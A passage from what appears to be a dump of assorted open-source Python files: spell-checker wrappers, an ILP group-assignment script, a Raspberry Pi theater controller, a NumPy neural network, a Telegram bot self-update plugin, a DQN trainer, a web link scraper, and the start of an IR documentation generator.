'dont-sug-typo-analysis', 'sug-repl-table', 'dont-sug-repl-table', 'rem-sug-split-char',\n 'add-sug-split-char', 'warn', 'affix-compress', 'dont-affix-compress', 'clean-affixes',\n 'dont-clean-affixes', 'invisible-soundslike', 'dont-invisible-soundslike', 'partially-expand',\n 'dont-partially-expand', 'skip-invalid-words', 'dont-skip-invalid-words', 'validate-affixes',\n 'dont-validate-affixes', 'validate-words', 'dont-validate-words', 'b', 'x', 'backup', 'dont-backup',\n 'byte-offsets', 'dont-byte-offsets', 'm', 'P', 'guess', 'dont-guess', 'keymapping', 'reverse',\n 'dont-reverse', 'suggest', 'dont-suggest', 'time', 'dont-time'\n\n }\n\n if 'mode' not in options:\n options['mode'] = 'none'\n\n for k, v in options.items():\n if k not in disallowed:\n key = ('-%s' if len(k) == 1 else '--%s') % k\n if isinstance(v, bool) and v is True:\n cmd.append(key)\n elif isinstance(v, str):\n cmd.extend([key, v])\n elif isinstance(v, int):\n cmd.extend([key, str(v)])\n elif isinstance(v, list):\n for value in v:\n cmd.extend([key, str(value)])\n\n if file_name is not None:\n cmd.append(file_name)\n\n return cmd\n\n\nclass Hunspell(SpellChecker):\n \"\"\"Hunspell spell check class.\"\"\"\n\n def __init__(self, config, binary='', verbose=0, debug=False):\n \"\"\"Initialize.\"\"\"\n\n super().__init__(config, binary, verbose, debug)\n self.binary = binary if binary else 'hunspell'\n\n def setup_spellchecker(self, task):\n \"\"\"Setup spell checker.\"\"\"\n\n return task.get('hunspell', {})\n\n def setup_dictionary(self, task):\n \"\"\"Setup dictionary.\"\"\"\n\n dictionary_options = task.get('dictionary', {})\n output = os.path.abspath(dictionary_options.get('output', self.dict_bin))\n wordlists = dictionary_options.get('wordlists', [])\n if wordlists:\n self.compile_dictionary('', dictionary_options.get('wordlists', []), None, output)\n else:\n output = None\n return output\n\n def compile_dictionary(self, lang, 
wordlists, encoding, output):\n \"\"\"Compile user dictionary.\"\"\"\n\n wordlist = ''\n\n try:\n output_location = os.path.dirname(output)\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n if os.path.exists(output):\n os.remove(output)\n\n self.log(\"Compiling Dictionary...\", 1)\n # Read word lists and create a unique set of words\n words = set()\n for wordlist in wordlists:\n with open(wordlist, 'rb') as src:\n for word in src.read().split(b'\\n'):\n words.add(word.replace(b'\\r', b''))\n\n # Sort and create wordlist\n with open(output, 'wb') as dest:\n dest.write(b'\\n'.join(sorted(words)) + b'\\n')\n except Exception:\n self.log('Problem compiling dictionary.', 0)\n self.log(\"Current wordlist '%s'\" % wordlist)\n raise\n\n def spell_check_no_pipeline(self, sources, options, personal_dict):\n \"\"\"Spell check without the pipeline.\"\"\"\n\n for source in sources:\n if source._has_error(): # pragma: no cover\n yield Results([], source.context, source.category, source.error)\n\n cmd = self.setup_command(source.encoding, options, personal_dict, source.context)\n self.log('', 3)\n self.log(\"Command: \" + str(cmd), 4)\n try:\n wordlist = util.call_spellchecker(cmd, input_text=None, encoding=source.encoding)\n yield Results(\n [w for w in sorted(set(wordlist.replace('\\r', '').split('\\n'))) if w],\n source.context,\n source.category\n )\n except Exception as e: # pragma: no cover\n err = self.get_error(e)\n yield Results([], source.context, source.category, err)\n\n def setup_command(self, encoding, options, personal_dict, file_name=None):\n \"\"\"Setup command.\"\"\"\n\n cmd = [\n self.binary,\n '-l'\n ]\n\n if encoding:\n cmd.extend(['-i', encoding])\n\n if personal_dict:\n cmd.extend(['-p', personal_dict])\n\n disallowed = {\n '1', 'a', 'D', 'G', 'h', 'help', 'l', 'L', 'm', 'P', 's', 'S', 'v', 'vv', 'w'\n }\n\n for k, v in options.items():\n if k not in disallowed:\n key = ('-%s' if len(k) == 1 else '--%s') % k\n if isinstance(v, bool) and v is True:\n cmd.append(key)\n elif isinstance(v, str):\n cmd.extend([key, v])\n elif isinstance(v, int):\n cmd.extend([key, str(v)])\n elif isinstance(v, list):\n for value in v:\n cmd.extend([key, str(value)])\n\n if file_name is not None:\n cmd.append(file_name)\n\n return cmd\n\n\ndef iter_tasks(matrix, names, groups):\n \"\"\"Iterate tasks.\"\"\"\n\n # Build name index\n name_index = {task.get('name', ''): index for index, task in enumerate(matrix)}\n\n for index, task in enumerate(matrix):\n name = task.get('name', '')\n group = task.get('group', '')\n hidden = task.get('hidden', False)\n if names and name in names and index == name_index[name]:\n yield task\n elif groups and group in groups and not hidden:\n yield task\n elif not names and not groups and not hidden:\n yield task\n\n\ndef spellcheck(config_file, names=None, groups=None, binary='', checker='', sources=None, verbose=0, debug=False):\n \"\"\"Spell check.\"\"\"\n\n hunspell = None\n aspell = None\n spellchecker = None\n config = util.read_config(config_file)\n if sources is None:\n sources = []\n\n matrix = config.get('matrix')\n preferred_checker = config.get('spellchecker', 'aspell')\n if matrix is None:\n matrix = config.get('documents')\n if matrix is not None:\n util.warn_deprecated(\"'documents' key in config is deprecated. 
'matrix' should be used going forward.\")\n else:\n raise KeyError(\n 'Unable to find or load matrix from pyspelling'\n ' configuration, for more'\n ' details on configuration please read'\n ' https://facelessuser.github.io/pyspelling/configuration/'\n )\n\n groups = set() if groups is None else set(groups)\n names = set() if names is None else set(names)\n\n # Sources are only recognized when requesting a single name.\n if (len(names) != 1 and len(sources)):\n sources = []\n\n processed_tasks = 0\n for task in iter_tasks(matrix, names, groups):\n\n processed_tasks += 1\n\n if not checker:\n checker = preferred_checker\n\n if checker == \"hunspell\": # pragma: no cover\n if hunspell is None:\n hunspell = Hunspell(config, binary, verbose, debug)\n spellchecker = hunspell\n\n elif checker == \"aspell\":\n if aspell is None:\n aspell = Aspell(config, binary, verbose, debug)\n spellchecker = aspell\n else:\n raise ValueError('%s is not a valid spellchecker!' % checker)\n\n spellchecker.log('Using {} to spellcheck {}'.format(checker, task.get('name', '')), 1)\n for result in spellchecker.run_task(task, source_patterns=sources):\n spellchecker.log('Context: %s' % result.context, 2)\n yield result\n spellchecker.log(\"\", 1)\n\n if processed_tasks == 0:\n raise ValueError(\n 'There are either no tasks in the configuration file'\n ' or the specified name or group can not be found.'\n )\n","repo_name":"facelessuser/pyspelling","sub_path":"pyspelling/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":24401,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"83"} +{"seq_id":"10362148432","text":"# -*- coding: utf-8 -*-\n\nimport collections\nimport csv\nimport numpy as np\nimport pulp\nimport argparse\n\ndef load_preference(filename):\n preference = {}\n group_list = []\n user_list = []\n with open(filename) as fin:\n reader = csv.reader(fin)\n header = True\n for row in reader:\n if header:\n header = False\n group_list = [v[v.find(\"[\")+1:-1] for v in row[3:]]\n else:\n user = \"%s,%s\" % (row[1], row[2])\n user_list.append(user)\n preference[user] = {}\n for (g, v) in zip(group_list, row[3:]):\n preference[user][g] = int(v)\n return preference, user_list, group_list\n\n\ndef find_best_assignment(user_list, group_list, preference):\n average = len(user_list) / 3\n model = pulp.LpProblem('assignment problem', pulp.LpMinimize)\n assignment = pulp.LpVariable.dicts('assignment', (user_list, group_list),\n lowBound=0, upBound=1, cat=pulp.LpInteger)\n group_chosen = pulp.LpVariable.dicts('chosen', group_list,\n lowBound=0, upBound=1, cat=pulp.LpInteger)\n model += sum([preference[u][g] * assignment[u][g]\n for u in user_list\n for g in group_list])\n # constraints: each person in a group\n for u in user_list:\n model += sum([assignment[u][g] for g in group_list]) == 1\n # constraints only three groups chosen\n model += sum([group_chosen[g] for g in group_list]) == 3\n # constraints each group with similar number of people\n for g in group_list:\n model += (sum([assignment[u][g] for u in user_list]) - average * group_chosen[g] ) >= 0\n model += (sum([assignment[u][g] for u in user_list]) - (average + 1) * group_chosen[g] ) <= 0\n model.solve()\n return assignment, group_chosen\n\ndef output_result(user_list, group_list, assignment, output_file):\n group_results = collections.defaultdict(list)\n for u in user_list:\n for g in group_list:\n if assignment[u][g].value() == 1:\n group_results[g].append(u)\n with open(output_file, \"w\") as 
fout:\n        for key in group_results:\n            fout.write(\"%s\\n\" % key)\n            for user in group_results[key]:\n                fout.write(\"%s\\n\" % user)\n            fout.write(\"\\n\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-i\", \"--input\", type=str,\n                        help=\"input preferences in csv format from google forms\")\n    parser.add_argument(\"-o\", \"--output\", type=str,\n                        help=\"output file for assignments\")\n    args = parser.parse_args()\n\n    preference, user_list, group_list = load_preference(args.input)\n    assignment, group_chosen = find_best_assignment(user_list, group_list, preference)\n    output_result(user_list, group_list, assignment, args.output)\n\n","repo_name":"chenhaot/reading_group_assignment_ilp","sub_path":"ilp_solve.py","file_name":"ilp_solve.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"32162462575","text":"import subprocess\nimport time\nimport os\nfrom curses import wrapper, curs_set\nfrom motor import StepperMotor, CLOCKWISE, COUNTERCLOCKWISE\nimport RPi.GPIO as GPIO\n\nVIDEO_DIR = \"./video\"\nVLC_CMD_BASE = [\n    \"vlc\",\n    \"--no-audio\",\n    \"--fullscreen\",\n    \"--no-video-title-show\",\n    \"--play-and-exit\",\n    \"--quiet\"\n]\nMOTOR_PINS = [11, 13, 15, 16]\nMOTOR_STEPS = 4000\nMOTOR_SPEED = 0.001\nLED_PINS = [12]\nOPEN = CLOCKWISE  # also used to make the lights go up\nCLOSE = COUNTERCLOCKWISE  # or to make the lights go down\n\n(_, _, filenames) = next(os.walk(VIDEO_DIR))\n\ndef play_all_movies(stdscr):\n    try:\n        gpio_init()\n        motor = StepperMotor(*MOTOR_PINS)\n        curs_set(0)\n        stdscr.clear()\n        for f in filenames:\n            video = os.path.join(VIDEO_DIR, f)\n            cmd = VLC_CMD_BASE + [video]\n            resp = subprocess.check_call(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n            cycle_curtain(motor, stdscr)\n    except KeyboardInterrupt:\n        pass\n    GPIO.cleanup()\n\ndef gpio_init():\n    GPIO.setmode(GPIO.BOARD)\n    GPIO.setup(MOTOR_PINS + LED_PINS, GPIO.OUT)\n\ndef cycle_curtain(motor: StepperMotor, stdscr):\n    curs_set(0)\n    stdscr.clear()\n    stdscr.addstr(0, 0, \"Drawing curtain\")\n    stdscr.refresh()\n    run_curtain(motor, MOTOR_STEPS, OPEN, MOTOR_SPEED)\n    stdscr.addstr(1, 0, \"Lights up!\")\n    stdscr.refresh()\n    pwm = run_lights(OPEN, 5)\n    time.sleep(10)\n    stdscr.addstr(2, 0, \"Lights down!\")\n    run_lights(CLOSE, 5, pwm)\n    stdscr.refresh()\n    stdscr.addstr(3, 0, \"Drawing curtain back\")\n    stdscr.refresh()\n    run_curtain(motor, MOTOR_STEPS, CLOSE, MOTOR_SPEED)\n\ndef run_curtain(motor: StepperMotor, steps: int, d: bool, step_time: float):\n    motor.run(steps, d, step_time)\n\ndef run_lights(up: bool, cycle_time: float, pwm=None):\n    \"\"\"\n    cycle time should be in seconds - how long it should take to run the cycle.\n    as soon as the PWM object goes out of scope, it shuts itself off.\n    so we have to return pwm and make sure to assign it to something.\n    smells a little hacky, but why not?\n    \"\"\"\n    if pwm is None:\n        pwm = GPIO.PWM(LED_PINS[0], 100)\n    starting_cycle = 0 if up else 100\n    pwm.start(starting_cycle)\n    dc_steps = list()\n    if up:\n        dc_steps = range(0, 101, 1)\n    else:\n        dc_steps = range(100, -1, -1)\n    interval = cycle_time / len(dc_steps)\n    for dc in dc_steps:\n        pwm.ChangeDutyCycle(dc)\n        time.sleep(interval)\n    return pwm\n\n\nif __name__ == \"__main__\":\n    # gpio_init()\n    # pwm = run_lights(OPEN, 5)\n    # print(\"done with light?\")\n    # time.sleep(5)\n    # run_lights(CLOSE, 5, pwm)\n    # GPIO.cleanup()\n
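    # NOTE: the commented-out lines above are a manual smoke test for the lights.\n    # run_lights returns the PWM object deliberately: per its docstring, the LEDs\n    # shut off as soon as the object is garbage collected, so the caller must keep\n    # a reference for as long as the lights should stay on, e.g.\n    #   pwm = run_lights(OPEN, 5)    # fade up and keep pwm alive\n    #   run_lights(CLOSE, 5, pwm)    # reuse the same PWM channel to fade down\n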
    wrapper(play_all_movies)\n","repo_name":"briehl/rpi-theater","sub_path":"theater.py","file_name":"theater.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"30020014760","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.preprocessing import OneHotEncoder\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nmpl.rcParams['axes.unicode_minus'] = False\n\n# sigmoid function (and its derivative when deriv=True)\ndef g(z, deriv=False):\n    if deriv == True:\n        return z*(1-z)\n    return 1.0/(1+np.exp(-z))\n\n# model: forward pass\ndef model(x, theta1, theta2):\n    z2 = x.dot(theta1)\n    a2 = g(z2)\n    z3 = a2.dot(theta2)\n    a3 = g(z3)\n    return a2, a3\n\n# cost function\ndef costfunc(h, y):\n    m = len(h)\n    J = -1.0/m*np.sum(y*np.log(h)+(1-y)*np.log(1-h))\n    return J\n\n# accuracy\ndef score(h, y):\n    # multi-class treated as several binary problems: [0.1, 0.7, 0.1, 0.1] = [0, 1, 0, 0]\n    m = len(h)\n    count = 0\n    for i in range(m):\n        if np.argmax(h[i]) == np.argmax(y[i]):\n            count += 1\n    return count/m\n\n# backpropagation (BP)\ndef BP(a1, a2, a3, y, theta1, theta2, alpha):\n    delta3 = a3-y  # backpropagated error\n    delta2 = delta3.dot(theta2.T)*g(a2, deriv=True)\n    m = len(a1)\n    deltatheta1 = 1.0/m*a1.T.dot(delta2)\n    deltatheta2 = 1.0/m*a2.T.dot(delta3)\n\n    theta1 -= deltatheta1*alpha\n    theta2 -= deltatheta2*alpha\n    return theta1, theta2\n\n# find the optimum by gradient descent\ndef gradDesc(x, y, hidden_layer_sizes=(17, ), max_iter=1500, alpha=0.1):\n    m, n = x.shape  # x is multiplied with theta\n    col = y.shape[1]  # number of labels\n    theta1 = 2*np.random.rand(n, hidden_layer_sizes[0])-1\n    theta2 = 2*np.random.rand(hidden_layer_sizes[0], col)-1  # rows match theta1's output, columns match the label count\n    jarr = np.zeros(max_iter)\n\n    for i in range(max_iter):\n        a2, a3 = model(x, theta1, theta2)\n        jarr[i] = costfunc(a3, y)\n        theta1, theta2 = BP(x, a2, a3, y, theta1, theta2, alpha)\n    return jarr, theta1, theta2\n\n# preprocessing\ndef preprocess(x, y):\n    # standard scaling\n    meanx = np.mean(x)\n    sigma = np.std(x, ddof=1)\n    x = (x-meanx)/sigma\n    m = len(x)\n    # prepend the bias column\n    x = np.c_[np.ones((m, 1)), x]\n    y = np.c_[y]\n    return x, y\n\n# load the data\nx = np.loadtxt('imgX.txt', delimiter=',')\ny = np.loadtxt('labely.txt', delimiter=',')\ny[y == 10] = 0\nx, y = preprocess(x, y)\n\n# multi-class converted to several binary problems\ncoder = OneHotEncoder(categories='auto')  # 'auto' infers the categories\ny = coder.fit_transform(y).toarray()  # fit the encoder, then transform\n# y now holds 0/1 indicator columns\n\n# shuffle; indices and elements move together, so the preprocessing is unaffected\nm = len(x)\nnp.random.seed(0)\norder = np.random.permutation(m)  # random permutation of the indices\nx = x[order]\ny = y[order]\nn = x.shape[0]\n\n# split\nnum = int(m*0.7)\ntrainx, testx = np.split(x, [num])\ntrainy, testy = np.split(y, [num])\n\n# train the model\njarr, theta1, theta2 = gradDesc(trainx, trainy, hidden_layer_sizes=(80, ), max_iter=2000)\n\n# compute predictions\na2, trainh = model(trainx, theta1, theta2)\na2, testh = model(testx, theta1, theta2)\n\nplt.plot(jarr)\nplt.show()\n\nprint('train score', score(trainy, trainh))\nprint('test score', score(testy, testh))\n\n# convert the one-hot encoding back to numeric labels so the confusion matrix is computed correctly\ntesty = np.argmax(testy, axis=1)\ntesth = np.argmax(testh, axis=1)\n\nprint('Confusion matrix:\\n', confusion_matrix(testy, testh))\nprint('Classification report:\\n', classification_report(testy, testh))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"htqdgithub265104/test","sub_path":"machine_one/Neural_NetWork/Neural_Work_OHE.py","file_name":"Neural_Work_OHE.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
+{"seq_id":"9884003621","text":"\"\"\" Pulls in the new version of PagerMaid from the git server. 
\"\"\"\n\nimport platform\nfrom subprocess import run, PIPE\nfrom datetime import datetime\nfrom time import strftime\nfrom os import remove\nfrom git import Repo\nfrom git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError\nfrom pagermaid import log\nfrom pagermaid.listener import listener\nfrom pagermaid.utils import execute\n\n\n@listener(is_plugin=False, outgoing=True, command=\"update\",\n description=\"从远程来源检查更新,并将其安装到 PagerMaid-Modify。\",\n parameters=\"\")\nasync def update(context):\n if len(context.parameter) > 1:\n await context.edit(\"无效的参数。\")\n return\n await context.edit(\"正在检查远程源以进行更新 . . .\")\n parameter = None\n if len(context.parameter) == 1:\n parameter = context.parameter[0]\n repo_url = 'https://github.com/xtaodada/PagerMaid-Modify.git'\n\n if parameter:\n if parameter == \"debug\":\n # Version info\n git_version = run(\"git --version\", stdout=PIPE, shell=True).stdout.decode().strip().replace(\"git version \", \"\")\n git_change = bool(run(\"git diff-index HEAD --\", stdout=PIPE, shell=True).stdout.decode().strip())\n git_change = \"是\" if git_change else \"否\"\n git_date = run(\"git log -1 --format='%at'\", stdout=PIPE, shell=True).stdout.decode()\n git_date = datetime.utcfromtimestamp(int(git_date)).strftime(\"%Y/%m/%d %H:%M:%S\")\n git_hash = run(\"git rev-parse --short HEAD\", stdout=PIPE, shell=True).stdout.decode().strip()\n get_hash_link = f\"https://github.com/xtaodada/PagerMaid-Modify/commit/{git_hash}\"\n # Generate the text\n text = \"系统名称及版本号:`\" + str(platform.platform()) + \"`\\n系统版本号:`\" + str(platform.version()) + \"`\\n系统位数:`\" + platform.architecture()[0] + \"`\\nPython 版本号:`\" + str(platform.python_version()) + \"`\\n\\nGit 版本号:`\" + git_version + \"`\\n本地修改:\" + git_change + \"\\n哈希值:[\" + git_hash + \"](\" + get_hash_link + \")\\n提交时间:`\" + git_date + \"`\"\n await context.edit(text)\n return\n\n try:\n repo = Repo()\n except NoSuchPathError as exception:\n await context.edit(f\"出错了呜呜呜 ~ 目录 {exception} 不存在。\")\n return\n except InvalidGitRepositoryError:\n await context.edit(f\"此 PagerMaid-Modify 实例不是从源安装,\"\n f\" 请通过您的本机软件包管理器进行升级。\")\n return\n except GitCommandError as exception:\n await context.edit(f'出错了呜呜呜 ~ 收到了来自 git 的错误: `{exception}`')\n return\n\n active_branch = repo.active_branch.name\n if not await branch_check(active_branch):\n await context.edit(\n f\"出错了呜呜呜 ~ 该分支未维护: {active_branch}.\")\n return\n\n try:\n repo.create_remote('upstream', repo_url)\n except BaseException:\n pass\n\n upstream_remote = repo.remote('upstream')\n upstream_remote.fetch(active_branch)\n changelog = await changelog_gen(repo, f'HEAD..upstream/{active_branch}')\n\n\n if not parameter:\n if not changelog:\n await context.edit(f\"`PagerMaid-Modify 在分支 ` **{active_branch}**` 中已是最新。`\")\n return\n changelog_str = f'**找到分支 {active_branch} 的更新.\\n\\n更新日志:**\\n`{changelog}`'\n if len(changelog_str) > 4096:\n await context.edit(\"更新日志太长,正在附加文件。\")\n file = open(\"output.log\", \"w+\")\n file.write(changelog_str)\n file.close()\n await context.client.send_file(\n context.chat_id,\n \"output.log\",\n reply_to=context.id,\n )\n remove(\"output.log\")\n else:\n await context.edit(changelog_str + \"\\n**执行 \\\"-update true\\\" 来安装更新。**\")\n return\n\n\n await context.edit('找到更新,正在拉取 . . 
.')\n\n    try:\n        try:\n            upstream_remote.pull(active_branch)\n        except:\n            await execute(\"\"\"git status | grep modified | sed -r \"s/ +/ /\" | cut -f2 | awk -F \" \" '{print \"mkdir -p $(dirname ../for-update/\" $2 \") && mv \" $2 \" ../for-update/\" $2}' | sh\"\"\")\n            await execute(\"git pull\")\n            await execute(\"\"\"cd ../for-update/ && find -H . -type f | awk '{print \"cp \" $1 \" ../PagerMaid-Modify/\" $1}' | sh && cd ../PagerMaid-Modify\"\"\")\n            await execute(\"rm -rf ../for-update/\")\n            await execute(\"python3 -m pip install -r requirements.txt --upgrade\")\n            await execute(\"python3 -m pip install -r requirements.txt\")\n        await log(\"PagerMaid-Modify 已更新。\")\n        await context.edit(\n            '更新成功,PagerMaid-Modify 正在重新启动。'\n        )\n        await context.client.disconnect()\n    except GitCommandError:\n        upstream_remote.git.reset('--hard')\n        await log(\"PagerMaid-Modify 更新失败。\")\n        await context.edit(\n            '更新时出现错误,PagerMaid-Modify 正在重新启动。'\n        )\n        await context.client.disconnect()\n\n\nasync def changelog_gen(repo, diff):\n    result = ''\n    d_form = \"%d/%m/%y\"\n    for c in repo.iter_commits(diff):\n        result += f'•[{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\\n'\n    return result\n\n\nasync def branch_check(branch):\n    official = ['master', 'staging']\n    for k in official:\n        if k == branch:\n            return 1\n    return\n","repo_name":"mylanyong/PagerMaid-Modify","sub_path":"pagermaid/modules/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"}
+{"seq_id":"33319488139","text":"import random\nimport math\nimport torch\nimport torch.nn as nn\nfrom collections import namedtuple\nfrom collections import deque\nimport sys\nsys.path.append('../')\nfrom trainer import Trainer, Experience\n\nclass WithMultiStepTrainer(Trainer):\n    def __init__(self, agent, env, logger=None, multi_step_num=3):\n        super().__init__(agent, env, logger)\n        self.multi_step_num = multi_step_num\n    \n    def train(self, episode_count=500, buffer_size=50000, batch_size=32, learning_start_buffer_size=4096, gamma=0.9, render=False, disp_freq=10):\n        # Initialize the logger\n        config_data = {\n            \"episode_count\": episode_count,\n            \"buffer_size\":buffer_size,\n            \"batch_size\":batch_size,\n            \"learning_start_buffer_size\":learning_start_buffer_size,\n            \"gamma\": gamma,\n        }\n        self.logger.initialize(str(self.env.spec), config_data)\n\n        self.experiences = deque(maxlen=buffer_size)\n\n        # Queues for keeping past states\n        # Updates use multi_step_num steps of information including the current step,\n        # so keep data for the previous multi_step_num-1 steps\n        past_states = deque(maxlen=self.multi_step_num-1)\n        past_actions = deque(maxlen=self.multi_step_num-1)\n        past_rewards = deque(maxlen=self.multi_step_num-1)\n\n        # Run the specified number of episodes\n        for e in range(episode_count):\n            past_states.clear()\n            past_actions.clear()\n            past_rewards.clear()\n\n            s = self.env.reset()\n            s = torch.from_numpy(s).float().unsqueeze(0)\n            episode_reward = 0.0\n            done = False\n            # Run one episode\n            while not done:\n                if render:\n                    self.env.render()\n                \n                # Step the environment following the agent's policy\n                a = self.agent.policy(s)\n                n_state, reward, done, info = self.env.step(a[0][0].item())\n                n_state = torch.from_numpy(n_state).float().unsqueeze(0)\n\n                if len(past_states) == self.multi_step_num-1:\n                    # Compute the multi_step_num-step return (r_t1 + gamma*r_t2 + ... 
+ gamma^n*r_tn-1)\n                    sum_reward = 0.0\n                    for i in range(self.multi_step_num-1):\n                        sum_reward += past_rewards[i] * math.pow(gamma, i)\n                    sum_reward += reward * math.pow(gamma, self.multi_step_num-1)\n\n                    # Store the experience for the state from multi_step_num steps back\n                    experience = Experience(past_states[0], past_actions[0], sum_reward, n_state, done)\n                    self.experiences.append(experience)\n\n                    if len(self.experiences) > learning_start_buffer_size:\n                        batch = random.sample(self.experiences, batch_size)\n                        self.agent.update(batch, math.pow(gamma, self.multi_step_num))  # the gamma applied to Q(s', a') is raised to the multi_step_num-th power\n\n                # Update the history queues\n                past_states.append(s)\n                past_actions.append(a)\n                past_rewards.append(reward)\n\n                # Update the state\n                s = n_state\n                episode_reward += reward\n            \n            self.agent.update_target_model()\n\n            self.logger.add({\"episode\":e, \"reward\":episode_reward, \"epsilon\":self.agent.epsilon})\n            # Print a log line at fixed intervals\n            if e % disp_freq == 0:\n                print(\"At episode {}, reward={}, epsilon={}\".format(e, self.logger.get(\"reward\", disp_freq), self.agent.epsilon))\n","repo_name":"KASSII/reinforcement-learning","sub_path":"DQN/DQN_with_multi_step/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"20285676863","text":"# BasicLinkScraper\n# (c)2021 Trevor D. Brown.\n# Distributed under the MIT license.\n#\n# BasicLinkScraper.py - scrapes a specified base URL's specified pages for\n#                       specified links with specified extensions. Adapted\n#                       from the GeeksForGeek's article:\n#                       https://www.geeksforgeeks.org/python-program-to-recursively-scrape-all-the-urls-of-the-website/\n#\n# History:\n#     02/16/2021 - Trevor D. Brown\n#         Created file.\n#         Began adapting script for my specific use cases.\n#\n# Known Issues/TODOs:\n#     TODO 1: Work on handling special links (i.e. mailto, tel, etc.)\n#     TODO 2: Work on URLs with relative addressing (i.e. ./page.html, ./../another-page.html)\n#     TODO 3: Find a better approach for try/except statement in scrape function.\n#     TODO 4: Add support for file exports, instead of depending on shell output redirection.\n\nimport sys    # used for argument parsing.\nfrom bs4 import BeautifulSoup    # used for HTML parsing.\nimport requests    # used to retrieve web pages.\n\n# scrape - scrapes a specified site\ndef scrape (site, base, extensions, linksOnly):\n    # lists\n    urls = []\n\n    if (not linksOnly):\n        urls.append(\"%s:\" % (site))\n\n    # GET request to the specified site.\n    request = requests.get(site)\n\n    # Parsing the returned HTML.\n    parsedHTML = BeautifulSoup(request.text,\"html.parser\")\n\n    # For all anchor tags found on the page, extract their href attribute.\n    for element in parsedHTML.find_all(\"a\"):\n        # Reference: TODO 3\n        try:\n            href = element.attrs['href']\n\n            # Reference: TODO 2\n            if (str(href).startswith(\"./\")):\n                site = base + str(href).replace(\"./\", \"\")\n            else:\n                site = base + href\n\n            # If the site ends with a requested extension, or the user has specified any extension, add it to the list.\n            if ((site.endswith(tuple(extensions))) or (extensions == [\"*\"])):\n                if (site not in urls):\n                    # Get the format of the URL, based on the \"linksonly\" argument's status.\n                    urlString = \"\"\n\n                    if (not linksOnly):\n                        urlString = (\"\\t%s\" % (site))\n                    else:\n                        urlString = (\"%s\" % (site))\n\n                    urls.append(\"%s\" % (urlString))\n\n        except:\n            # We're not too concerned with exceptions...\n            # but, this had to be here to work.
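            # (element.attrs['href'] raises KeyError for anchors without an href\n            # attribute; that is what this bare except is really swallowing -- see TODO 3.)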
            pass\n\n    return urls\n\n# parseArgs - determine what has been defined\ndef parseArgs ():\n    # Variables that are passed via command line arguments:\n    baseURL = \"\"         # The base URL for the website (i.e. https://www.example.com/)\n    pages = []           # The list of pages requested for parsing, delimited by commas. (i.e. index.html,contacts.htm)\n    extensions = []      # The list of extensions to look for during parsing, delimited by commas. (i.e. .pdf,.jpg)\n    linksOnly = False    # Determining if only the retrieved links are to be printed, or all extra statements.\n\n    for i, arg in enumerate(sys.argv):\n        if (i > 0):\n            if ((arg == \"--baseURL\") or (arg == \"-u\")):\n                baseURL = sys.argv[i+1]\n            elif ((arg == \"--pages\") or (arg == \"-p\")):\n                pages = sys.argv[i+1].split(\",\")\n            elif ((arg == \"--extensions\") or (arg == \"-e\")):\n                extensions = sys.argv[i+1].split(\",\")\n            elif ((arg == \"--linksonly\")):\n                linksOnly = True\n\n    return baseURL, pages, extensions, linksOnly\n\n# main - the primary driver for the script.\ndef main ():\n\n    allScrapedURLs = []\n    baseURL, pages, extensions, linksOnly = parseArgs()\n\n    if (baseURL):\n        if (len(pages) <= 0):\n            pages = [\"index.html\"]    # Check only the index page of the site, if no specific page is given.\n\n        if (len(extensions) <= 0):\n            extensions = [\"*\"]    # Get every href link, if no specific extension is given.\n\n        for page in pages:\n            site = baseURL + page\n\n            # Scrape the page\n            scrapedURLs = scrape(site, baseURL, extensions, linksOnly)\n\n            allScrapedURLs.extend(scrapedURLs)\n\n        if (len(allScrapedURLs) > 0):\n            for url in allScrapedURLs:\n                print(url)\n    else:\n        if (not linksOnly):\n            print(\"No base URL defined.\")\n\n# Calling the main function...\nmain()","repo_name":"TrevorDBrown/Random","sub_path":"Python/BasicLinkScraper/BasicLinkScraper.py","file_name":"BasicLinkScraper.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"}
+{"seq_id":"10267237238","text":"import collections\nimport json\nimport sys\n\nOpClasses = collections.OrderedDict()\n\ndef get_ir_classes(ops, defines):\n    global OpClasses\n\n    for op_key, op_vals in ops.items():\n        if not (\"Last\" in op_vals):\n            OpClass = \"#Unknown\"\n\n            if (\"OpClass\" in op_vals):\n                OpClass = op_vals[\"OpClass\"]\n\n            if not (OpClass in OpClasses):\n                OpClasses[OpClass] = []\n\n            OpClasses[OpClass].append([op_key, op_vals])\n\n    # Sort the dictionary after we are done parsing it\n    OpClasses = collections.OrderedDict(sorted(OpClasses.items()))\n\ndef print_ir_op_index():\n    output_file.write(\"# Index\\n\")\n    output_file.write(\"## Op Classes\\n\")\n    for class_key, class_value in OpClasses.items():\n        output_file.write(\"- [%s](#%s)\\n\\n\" % (class_key, class_key))\n\n    output_file.write(\"## Definitions\\n\")\n    output_file.write(\"- [Defines](#Defines)\\n\\n\")\n\ndef print_ir_ops():\n    for class_key, class_value in OpClasses.items():\n        output_file.write(\"# %s\\n\\n\" % (class_key))\n        for op in class_value:\n            op_key = op[0]\n            op_vals = op[1]\n            output_file.write(\"## %s\\n\" % (op_key))\n            HasDest = (\"HasDest\" in op_vals and op_vals[\"HasDest\"] == True)\n            HasSSAArgs = 